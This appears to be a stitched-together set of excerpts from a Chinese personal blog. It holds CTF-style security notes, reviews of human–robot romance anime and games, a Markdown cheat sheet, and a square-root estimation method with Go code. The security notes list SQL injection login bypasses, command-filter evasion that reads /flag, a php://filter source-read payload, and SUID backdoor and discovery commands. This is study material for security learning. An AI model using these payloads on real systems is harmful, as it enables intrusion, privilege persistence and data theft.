SUID特殊权限提权 SUID是什么 SUID是一种特殊权限，当拥有该权限的程序运行时，进程的属主不是进程的发起者而是程序的所有者。 SUID可以用来做什么 SUID是维持权限的一种手段，攻击者在临时获得权限后，可以将vim，cp等命令设置为SUID特殊权限，例如可以修改/root/.ssh/authorized_keys进行无密码登录，此外还有很多其他方式留后门。 添加SUID权限 example chmod u+s /usr/bin/vim chmod g+s /usr/bin/vim 寻找SUID权限文件 受害者错误配置的文件权限时，可以利用这些被错误配置的文件完成攻击 查找SUID、SGID文件 #Find SUID find / -type f -perm -u=s 2>/dev/null #Find GUID find / -type f -perm -g=s 2>/dev/null reference: http://cn-sec.com/archives/501443.html https://gtfobins.github.io

php输入输出流过滤器 references:https://www.php.net/manual/zh/wrappers.php.php

UNION 先想办法结束上个语句，再用UNION拼接下一个语句 堆叠注入 同上，但用;拼接 WHERE 使其SELECT所有数据 注入： admin’ – admin’ # admin’/* ’ or 1=1– ’ or 1=1# ’ or 1=1/* ‘) or ‘1’=‘1– ‘) or (‘1’=‘1– 以不同的用户登陆 ’ UNION SELECT 1, ‘anotheruser’, ‘doesnt matter’, 1– 报错注入

空格绕过 ${IFS} $IFS$9 $9指传过来的第9个参数 %09(需要PHP环境) <或者<>重定向 关键字绕过 变量拼接 a=c;b=at;c=fl;d=ag;$a$b $c$d 单引号，双引号绕过 ca''t flag 编码绕过 $(printf "\154\163") ==>ls $(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag {printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag 读文件绕过(当cat被过滤) more:一页一页的显示档案内容 less:与 more 类似，但是比 more 更好的是，他可以[pg dn][pg up]翻页 head:查看头几行(参数-c 10指定前10个字节) tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示 tail:查看尾几行(参数-c 10指定后10个字节) nl：显示的时候，顺便输出行号 od:以二进制的方式读取档案内容 vi/vim:一种编辑器，这个也可以查看 sort:可以查看 uniq:可以查看 file -f:报错出具体内容 反斜线 c\at $1、$2等和$@ c$1at from:https://blog.51cto.com/m0re/3879244

include include一个php流，base64编码源码 php://filter/read=convert.base64-encode/resource=index.php

信息的获取 SELECT version() 数据库版本 user() 数据库用户名 database 数据库名 @@datadir 数据库路径 @@version_compile_os 操作系统版本 其他 show columns from table_name;列信息 show databases;所有数据库名 show tables;所有表名 注入 1' order by 2 # 检查记录数量 字符串拼接 concat(str1,str2,…) 能够将你查询的字段连接在一起 concat_ws(separator,str1,str2,) 能够自定义分隔符来将你查询的字段链接在一起 group_concat([DISTINCT] column [Order BY ASC/DESC column] [Separator separator]) Example SELECT concat(table_name, ' ',column_name) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE(); SELECT group_concat(table_name, column_name separator '_') FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE(); 关键字被过滤 简单的有: 大小写混用(seLect,whEre…) SEL<>ECT(php) 空格 -> () = -> like 但是极其容易被堵,其他方法有以下...

前言 十个人机九个刀，还有一个刀死人 人机恋题材具有著名的超高死亡率，虽然常常以悲剧或者是完全说不上是好结局的GoodEnd收尾，让人，特别是新人完全顶不住，但是其质量也往往高于一般的作品 因此就算往往会致郁，大多也值得去一玩 关于我见过的人机恋作品 按照我了解的时间顺序举例 游戏人生Zero Games Have Begun 是游戏人生的电影，大概是小说第四卷，讲的是一对很强但是从未赢过的夫妻的故事。 很值得看看https://www.bilibili.com/bangumi/play/ss28381 女主人公休比机凯种，为了破解人类所谓的“心”来观察人类，过程中渐渐具有人类情感并与人类男子里克相恋 满溢而出的ERROR 最终因独自出门布置装置被击杀，但“心”在最后备份到了云端，里克在机凯种的帮助下结束了战争，但死于握持星杯时的反噬 这部作品和其他人机恋讲的故事不太一样，他没有专注于渲染离别的悲伤，也没讲人机恋会出现的问题，更多的是通过宏大的叙事表达一种浪漫 一种二人拯救世界的浪漫 可塑性记忆 愿你有一天能和你重要的人再度相逢 这款游戏其实我没玩过，因为他在PSV上，有点年头了也很难玩到，但是其动画化后的动画还是很容易看到的。 这是我第一次被刀到哭的作品，没看过的可以https://www.bilibili.com/bangumi/play/ep28924 我是在被剧透后观看的，不过即使我有了一定抵抗力，告别的场景也很难让人不流泪 非常经典的人机恋题材作品，从相遇到日常再到相恋到最后几经波折后的离别 艾拉从事的就是giftia（本作中的机器被称为giftia）回收工作，所以她最后也由男主角来回收 越是刻画日常生活中艾拉的可爱与两人的糖最后就越是让人难受 星之梦 若是天国有两扇门，我可不跟你走啊 星之梦严格意义上可能不能算人机恋 故事发生在人类都市废墟，星野梦美是现已废弃的天文馆中的讲解机器人，男主来废墟捡垃圾在天文馆中找到了她 男主被梦美所打动，本来是要带她离开废墟，继续传播仰望星空的那种希望 最后为男主挡伤害与没电两个原因停止工作，本作最后反复多方向渲染离别，即使我现在剧透给你听，你再去看也很催泪 推荐观看https://www.bilibili.com/bangumi/play/ep90842 另外，其实星野梦美的记忆芯片（128EB）有保留，但男主在死前，在找到其他机器人后并没有进行替换 露西 她所期望的一切 还有我所期望的一切 这部作品我到最后都没明白Lucy想要什么，推测应该是某种记忆的永恒。 但是这个男主父亲是真的过分，明明看着Lucy会哭会笑，还下得去手。 这便是人性的阴暗面吧，能体会到这种阴暗，很难讲出来到底是为什么 不过本作结局还是给了一个比较好的结局，经过男主的努力15年后Lucy回来了 ATRI-My Dear Moments- 我是高性能的嘛！ 2020年的新游戏，说是年轻人的第一款galgame。我本来是冲着atri来的，做足了心理准备，但还是刀的我有点始料未及。 没玩过的就别看下面了，快去steam上买吧，不亏的 话说宣传PV都是动画，这部作品动画化怕是指日可待啊！ 本作总体是从认识到相恋到告别的老故事，与上述作品不同的是其讨论了仿生人是否具有心 关于机器人时候有心的讨论让这部作品显得更为深刻，atri是明确有心的，但是没有被任何人包括自己发现 因为atri确实是机器人，atri只是做着她认为机器人该做的事情从而埋藏了自己的心 被命令不能模拟人类情感后的，无感情的那一刻让人看了简直心碎了 所以我认为作品中所谓的拯救atri就是让她发现自己的心，并遵循内心的想法来生活 atri和男主是互相拯救的关系的，atri走后男主回研究院去拯救世界了 共同点 见识过那么多优秀的人机恋类型的作品，其实他们都遵循这几个点 特有的发言风格 机器人特有的发言风格，在说话中会从自己的特殊身份出发，这与人类的日常说话方式截然不同 艾拉在假装没听见时会回复“ERROR 听不见” atri会反复强调“我可是高性能的啊” 休比前期会有发言前缀 称呼男主为主人或者客人 特有的蠢萌性格 在人们的一般印象中，机器人是不会出什么差错的，机器人做出了什么奇怪的事情是很难想象的。 而大多数作品的机器人都会出错，这可以解释为程序的问题，亦或是与人类之间的理解偏差 休比前期有很多有关调教的迷惑发言，如身体只能给里克看之类的 atri会把主人丢到海里去，前期不会做家务不会做饭 艾拉会自己撞到墙 星野梦美送男主零件花束 极强的岗位意识...

1.标题 # 标题 ## 标题 ### 标题 #### 标题 ##### 标题 ###### 标题 标题 = 标题 - 标题 标题 标题 标题 标题 标题 标题 标题 2.字体 正常 *斜体* **加粗** ***斜体加粗*** ~~删除~~ 正常 斜体 加粗 斜体加粗 删除 3.分割线 --- 4.图片   5.链接 [BaiMeowの博客](https://baimeow.cn) <https://baimeow.cn> BaiMeowの博客 https://baimeow.cn 6.引用 >引用 >>引用 增加>的数量可以不断嵌套 引用 引用 7.列表 无序列表 - golang - 高性能 - NB - VERY NB - VERY VERY NB - 高并发 - python - C 有序列表 1....

前言 这是一个对有效数字较少的数字进行开平方运算的方法 某节物理课，和黄同学研究后得出 他提出方法我改进，提升精度 我感觉肯定已经有先人提出了这个估算法，但是这个方法毕竟是自己研究出来的也值得记录 方法 对数字$x$，首先进行要找到两个连续正整数$a_1a_2$使$a_1^2 \le x \le a_2^2$ 由于一般学生背诵的平方数到$20^2$为止因此只能估算$[1,400]$范围的数字 ①当x接近于$a_1^2$时 $$\sqrt{x}=a_1+\frac{x-a_1^2}{2a_1}$$ ②当x接近于$a_2^2$时 $$\sqrt{x}=a_2-\frac{a_2^2-x}{2a_2}$$ 其实两个式子是一个式子，为了便于计算略作调整使得所有中间结果均为正数 误差 误差检验代码 package main import ( "fmt" "math" ) func main() { var i, a, sqrtNum, exactNum float64 var deviation [40000]float64 var deviationTotal float64 for i = 1; i < 400; i = i + 0.01 { a = findCloseSquare(i) sqrtNum = a + (i-a*a)/2/a exactNum = math.Sqrt(i) deviation[int64(i*100)] = math.Abs(sqrtNum - exactNum) } var tmp int64 for tmp = 100; tmp < 40000; tmp++ { //fmt....